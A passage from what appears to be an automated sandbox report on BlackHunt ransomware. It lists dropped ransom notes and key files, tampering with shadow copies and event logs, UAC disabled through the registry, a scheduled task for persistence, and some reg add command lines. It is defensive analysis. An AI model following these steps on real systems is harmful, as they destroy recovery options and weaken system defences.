File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\fsutil.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\sv-se\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\help.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\eu\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\dotnet\swidtag\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-gb\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\he-il\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main.css C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\COPYRIGHT C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\dtplugin\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons2x.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\zu\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\distribute_form.gif C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\es-es\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\plugin.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\xerces.md C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\gui\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fil_get.svg C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\mshta.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2264 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 2264 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 2264 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3936 wrote to memory of 3716 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3936 wrote to memory of 3716 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3460 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3460 wrote to memory of 2412 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3480 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3480 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3944 wrote to memory of 2028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3944 wrote to memory of 2028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3792 wrote to memory of 1260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3792 wrote to memory of 1260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1020 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1020 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2572 wrote to memory of 2520 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 2572 wrote to memory of 2520 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 784 wrote to memory of 3796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 784 wrote to memory of 3796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 4884 wrote to memory of 1788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4884 wrote to memory of 1788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 4808 wrote to memory of 3452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4808 wrote to memory of 3452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3484 wrote to memory of 4668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3484 wrote to memory of 4668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2264 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3204 wrote to memory of 716 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 3204 wrote to memory of 716 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

